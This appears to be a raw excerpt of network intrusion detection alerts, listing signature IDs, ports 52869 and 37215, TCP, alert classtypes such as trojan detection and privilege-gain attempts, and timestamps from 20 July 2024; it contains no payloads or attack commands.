                      SID:2027339
                      Source Port:57240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.139087
                      SID:2027339
                      Source Port:33326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.310476
                      SID:2835222
                      Source Port:46252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.316062
                      SID:2027339
                      Source Port:34682
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.050437
                      SID:2829579
                      Source Port:36676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.373413
                      SID:2025132
                      Source Port:37648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.131822
                      SID:2025132
                      Source Port:55624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.225562
                      SID:2027339
                      Source Port:57654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.821284
                      SID:2831300
                      Source Port:54816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.406154
                      SID:2027339
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2835222
                      Source Port:57638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.133658
                      SID:2831300
                      Source Port:44284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.260516
                      SID:2027339
                      Source Port:37610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.916755
                      SID:2027339
                      Source Port:51364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2831300
                      Source Port:40178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:40.564079
                      SID:2025132
                      Source Port:43712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2027339
                      Source Port:47618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2027339
                      Source Port:59942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.471777
                      SID:2831300
                      Source Port:38514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.441296
                      SID:2831300
                      Source Port:39752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.363471
                      SID:2027339
                      Source Port:37482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.453658
                      SID:2027339
                      Source Port:53192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.549242
                      SID:2025132
                      Source Port:55962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:53.637724
                      SID:2831300
                      Source Port:59854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.601492
                      SID:2025132
                      Source Port:47486
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.493434
                      SID:2027339
                      Source Port:52142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.174966
                      SID:2027339
                      Source Port:34930
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.888773
                      SID:2025132
                      Source Port:59730
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.372597
                      SID:2027339
                      Source Port:56352
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2027339
                      Source Port:51056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.754228
                      SID:2835222
                      Source Port:33252
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.598746
                      SID:2027339
                      Source Port:60868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2835222
                      Source Port:52608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.506329
                      SID:2025132
                      Source Port:41772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.781631
                      SID:2831300
                      Source Port:56756
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2027339
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.338625
                      SID:2027339
                      Source Port:53232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164884
                      SID:2027339
                      Source Port:47870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2831300
                      Source Port:43122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.565127
                      SID:2831300
                      Source Port:55272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.382234
                      SID:2025132
                      Source Port:51536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.038216
                      SID:2027339
                      Source Port:53690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2831300
                      Source Port:51304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2835222
                      Source Port:36032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.686159
                      SID:2025132
                      Source Port:46702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:01.154408
                      SID:2027339
                      Source Port:45424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.079146
                      SID:2027339
                      Source Port:56612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2835222
                      Source Port:53738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.214826
                      SID:2027339
                      Source Port:48252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.859779
                      SID:2835222
                      Source Port:53612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.631980
                      SID:2025132
                      Source Port:48926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.538013
                      SID:2831300
                      Source Port:33824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.047734
                      SID:2829579
                      Source Port:40502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.809290
                      SID:2025132
                      Source Port:35148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.516035
                      SID:2831300
                      Source Port:45748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.352208
                      SID:2025132
                      Source Port:50600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.219051
                      SID:2835222
                      Source Port:55142
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.653253
                      SID:2829579
                      Source Port:52084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.716925
                      SID:2831300
                      Source Port:47724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.445623
                      SID:2027339
                      Source Port:41504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.988990
                      SID:2829579
                      Source Port:57516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.763636
                      SID:2027339
                      Source Port:35418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.348098
                      SID:2831300
                      Source Port:45364
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.093159
                      SID:2831300
                      Source Port:40594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.331312
                      SID:2027339
                      Source Port:57970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.949221
                      SID:2829579
                      Source Port:37406
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2027339
                      Source Port:51932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.107285
                      SID:2027339
                      Source Port:45236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.327962
                      SID:2027339
                      Source Port:47748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.705397
                      SID:2027339
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.742051
                      SID:2027339
                      Source Port:35996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.787088
                      SID:2831300
                      Source Port:35826
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2835222
                      Source Port:44436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.472706
                      SID:2027339
                      Source Port:55180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.994808
                      SID:2027339
                      Source Port:40326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2829579
                      Source Port:49190
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.514709
                      SID:2831300
                      Source Port:40724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.512424
                      SID:2025132
                      Source Port:38240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2835222
                      Source Port:58388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.530128
                      SID:2831300
                      Source Port:51908
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2831300
                      Source Port:52956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:51.240850
                      SID:2027339
                      Source Port:35524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440705
                      SID:2831300
                      Source Port:55254
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2829579
                      Source Port:58900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.453720
                      SID:2027339
                      Source Port:37298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.122085
                      SID:2027339
                      Source Port:53158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515827
                      SID:2831300
                      Source Port:47546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2835222
                      Source Port:38026
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.756259
                      SID:2829579
                      Source Port:47258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.222315
                      SID:2831300
                      Source Port:40936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2027339
                      Source Port:46072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.750574
                      SID:2025132
                      Source Port:40702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2829579
                      Source Port:59432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.916554
                      SID:2027339
                      Source Port:53166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.472907
                      SID:2027339
                      Source Port:50824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.809666
                      SID:2027339
                      Source Port:58670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2835222
                      Source Port:35198
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.721858
                      SID:2027339
                      Source Port:34176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.374653
                      SID:2829579
                      Source Port:60324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323651
                      SID:2835222
                      Source Port:37816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.805358
                      SID:2025132
                      Source Port:56234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2027339
                      Source Port:40580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.328595
                      SID:2027339
                      Source Port:60116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.817334
                      SID:2025132
                      Source Port:43182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:07.408178
                      SID:2027339
                      Source Port:50578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.731750
                      SID:2027339
                      Source Port:43194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.493636
                      SID:2831300
                      Source Port:52986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:34208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2835222
                      Source Port:41440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.328888
                      SID:2829579
                      Source Port:38846
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:39.471724
                      SID:2027339
                      Source Port:58438
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.054544
                      SID:2835222
                      Source Port:49004
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.527690
                      SID:2831300
                      Source Port:60814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.125782
                      SID:2835222
                      Source Port:59174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.899974
                      SID:2027339
                      Source Port:38082
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.787088
                      SID:2025132
                      Source Port:60856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.268733
                      SID:2025132
                      Source Port:33652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.797336
                      SID:2027339
                      Source Port:38176
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.540944
                      SID:2027339
                      Source Port:50272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.592012
                      SID:2027339
                      Source Port:36532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.880153
                      SID:2025132
                      Source Port:46340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.035971
                      SID:2027339
                      Source Port:56224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.473003
                      SID:2027339
                      Source Port:51504
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.171719
                      SID:2831300
                      Source Port:34382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.196025
                      SID:2027339
                      Source Port:36472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2027339
                      Source Port:35066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.737127
                      SID:2025132
                      Source Port:33034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.696368
                      SID:2027339
                      Source Port:46052
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.578706
                      SID:2025132
                      Source Port:33706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.107735
                      SID:2829579
                      Source Port:48558
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.818179
                      SID:2025132
                      Source Port:39224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.322182
                      SID:2027339
                      Source Port:60386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.563341
                      SID:2025132
                      Source Port:44916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2835222
                      Source Port:38008
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:53020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.507639
                      SID:2027339
                      Source Port:38724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.841499
                      SID:2829579
                      Source Port:53096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.433779
                      SID:2831300
                      Source Port:51932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.568777
                      SID:2831300
                      Source Port:49816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.433285
                      SID:2027339
                      Source Port:50318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.742051
                      SID:2025132
                      Source Port:60324
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.906796
                      SID:2025132
                      Source Port:48220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.067591
                      SID:2835222
                      Source Port:51554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2829579
                      Source Port:52474
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.265746
                      SID:2027339
                      Source Port:50084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.672606
                      SID:2027339
                      Source Port:46856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439167
                      SID:2835222
                      Source Port:42722
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.493635
                      SID:2027339
                      Source Port:43720
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.227561
                      SID:2025132
                      Source Port:46750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.058256
                      SID:2829579
                      Source Port:59326
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.421231
                      SID:2025132
                      Source Port:34190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.528872
                      SID:2835222
                      Source Port:33484
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.139331
                      SID:2027339
                      Source Port:36122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.566382
                      SID:2027339
                      Source Port:50394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2027339
                      Source Port:60212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.677505
                      SID:2835222
                      Source Port:53664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.297065
                      SID:2027339
                      Source Port:43018
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2835222
                      Source Port:60758
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.966438
                      SID:2027339
                      Source Port:54848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2829579
                      Source Port:51880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2835222
                      Source Port:52550
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.158457
                      SID:2027339
                      Source Port:50326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.651508
                      SID:2025132
                      Source Port:51514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2829579
                      Source Port:58388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2831300
                      Source Port:49400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2829579
                      Source Port:47692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.376131
                      SID:2025132
                      Source Port:49180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.129772
                      SID:2835222
                      Source Port:51388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.361541
                      SID:2027339
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.555898
                      SID:2829579
                      Source Port:36238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.251572
                      SID:2025132
                      Source Port:58036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.805828
                      SID:2835222
                      Source Port:48756
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.607400
                      SID:2027339
                      Source Port:40552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.488770
                      SID:2027339
                      Source Port:40458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.816643
                      SID:2027339
                      Source Port:38376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.747119
                      SID:2027339
                      Source Port:45224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.062143
                      SID:2027339
                      Source Port:39614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.371348
                      SID:2027339
                      Source Port:47906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.887734
                      SID:2025132
                      Source Port:40808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.705914
                      SID:2025132
                      Source Port:35966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2835222
                      Source Port:39756
                      Destination Port:37215
